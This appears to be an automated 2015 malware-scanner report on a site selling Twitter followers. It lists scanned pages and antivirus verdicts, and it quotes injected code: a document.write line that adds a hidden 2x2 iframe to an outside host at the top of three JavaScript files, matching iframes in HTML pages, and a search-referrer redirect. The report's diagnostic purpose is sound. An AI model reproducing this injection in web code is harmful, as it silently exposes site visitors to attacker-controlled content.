New scan:

Malware Scanner report for purchasefollowersontwitter.com

Malicious/Suspicious/Total urls checked
3/0/16
3 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://vcminden.de/mzmd.html?h=1546115
49 websites infected.

The website "purchasefollowersontwitter.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/6/6
6 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.purchasefollowersontwitter.com/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: www.purchasefollowersontwitter.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Wed, 14 Oct 2015 13:08:34 GMT
Location: http://vcminden.de/mzmd.html?h=1546115
Server: Apache
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://www.purchasefollowersontwitter.com/
200 OK
Content-Length: 42702
Content-Type: text/html
clean
http://www.purchasefollowersontwitter.com/js/jquery-latest.js
200 OK
Content-Length: 120774
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115></iframe>');

(function(){
var
window = this,
undefined,
_jQuery = window.jQuery,
_$ = window.$,
jQuery = window.jQuery = window.$ = function( selector, context ) {
return new jQuery.fn.init( selector, context );
},
quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,

... 3494 bytes are skipped ...
ment["scroll" + name],
document.body["offset" + name], document.documentElement["offset" + name]
) :
// Get or set width or height on the element
size === undefined ?
// Get width or height on the element
(this.length ? jQuery.css( this[0], type ) : null) :
// Set the width or height on the element (default to pixels if value is unitless)
this.css( type, typeof size === "string" ? size : size + "px" );
};
});
})();

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-AML [Trj]
nProtect
Trojan.Iframe.BZW
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
F-Secure
Trojan.Iframe.BZW
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

Hidden iFrame found.
size: 2x2     
src: http://vcminden.de/mzmd.html?j=1546115

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115>

http://www.purchasefollowersontwitter.com/js/thickbox.js
200 OK
Content-Length: 11782
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115></iframe>');


var tb_pathToImage = "images/loadingAnimation.gif";
$(document).ready(function(){
tb_init('a.thickbox, area.thickbox, input.thickbox'); imgLoader = new Image(); imgLoader.src = tb_pathToImage;
});
function tb_init(domChunk){
$(domChunk).click(function(){
var t = this.title || this.nam
... 3559 bytes are skipped ...
r/> var w = window.innerWidth || self.innerWidth || (de&&de.clientWidth) || document.body.clientWidth;
var h = window.innerHeight || self.innerHeight || (de&&de.clientHeight) || document.body.clientHeight;
arrayPageSize = [w,h];
return arrayPageSize;
}
function tb_detectMacXFF() {
var userAgent = navigator.userAgent.toLowerCase();
if (userAgent.indexOf('mac') != -1 && userAgent.indexOf('firefox')!=-1) {
return true;
}
}

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://vcminden.de/mzmd.html?j=1546115

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115>

http://www.purchasefollowersontwitter.com/js/flowplayer-3.2.6.min.js
200 OK
Content-Length: 16971
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115></iframe>');

(function(){function g(o){console.log("$f.fireEvent",[].slice.call(o))}function k(q){if(!q||typeof q!="object"){return q}var o=new q.constructor();for(var p in q){if(q.hasOwnProperty(p)){o[p]=k(q[p])}}return o}function m(t,q){if(!t){return}var o,p=0,r=t.length;if(r===undefined){for(o in t){if(q.call(t[o],o,t[o])===false){b
... 3139 bytes are skipped ...
waveFlash.ShockwaveFlash")}catch(o){}}if(typeof p=="object"){l=p.GetVariable("$version");if(typeof l!="undefined"){l=l.replace(/^\S+\s+(.*)$/,"$1").split(",");m=[parseInt(l[0],10),parseInt(l[2],10)]}}}}return m},isSupported:function(k){var m=flashembed.getVersion();var l=(m[0]>k[0])||(m[0]==k[0]&&m[1]>=k[1]);return l},domReady:c,asString:g,getHTML:a});if(e){jQuery.fn.flashembed=function(l,k){var m=null;this.each(function(){m=flashembed(this,l,k)});return l.api===false?this:m}}})();

Antivirus reports:

Avast
JS:Iframe-AMJ [Trj]
Kaspersky
HEUR:Trojan.Script.Generic
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
Norman
Iframe.UW
GData
JS:Iframe-AMJ

Hidden iFrame found.
size: 2x2     
src: http://vcminden.de/mzmd.html?j=1546115

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115>

http://www.purchasefollowersontwitter.com/index.html
200 OK
Content-Length: 42702
Content-Type: text/html
clean
http://www.purchasefollowersontwitter.com/Services.html
200 OK
Content-Length: 23415
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://vcminden.de/mzmd.html?i=1546115

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=1546115>

http://feed2js.org//feed2js.php?src=http%3A%2F%2Fwww.purchasefollowersontwitter.com%2Fblog%2F%3Ffeed%3Drss2&num=10&desc=500>1&utf=y/
200 OK
Content-Length: 7729
Content-Type: application/x-javascript
clean
http://www.purchasefollowersontwitter.com/FAQ.html
200 OK
Content-Length: 26118
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://vcminden.de/mzmd.html?i=1546115

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=1546115>

http://www.purchasefollowersontwitter.com/Contact.html
200 OK
Content-Length: 25040
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://vcminden.de/mzmd.html?i=1546115

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=1546115>

http://www.purchasefollowersontwitter.com/blog
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 14 Oct 2015 13:08:44 GMT
Location: http://www.purchasefollowersontwitter.com/blog/
Server: Apache
Content-Length: 339
Content-Type: text/html; charset=iso-8859-1
clean
http://www.purchasefollowersontwitter.com/blog/
200 OK
Content-Length: 42345
Content-Type: text/html
clean
http://www.purchasefollowersontwitter.com/blog/wp-content/themes/twentytwelve/js/navigation.js?ver=1.0
200 OK
Content-Length: 895
Content-Type: application/javascript
clean
http://www.purchasefollowersontwitter.com/blog/sample-page/
200 OK
Content-Length: 5096
Content-Type: text/html
clean
http://www.purchasefollowersontwitter.com/test404page.js
404 Not Found
Content-Length: 442
Content-Type: text/html
clean
http://www.purchasefollowersontwitter.com/blog/the-5-ultimate-research-tools-for-twitter/
200 OK
Content-Length: 8901
Content-Type: text/html
clean
http://www.purchasefollowersontwitter.com/blog/category/uncategorized/
200 OK
Content-Length: 8905
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=purchasefollowersontwitter.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://purchasefollowersontwitter.com/

Result: purchasefollowersontwitter.com is not infected or malware details are not published yet.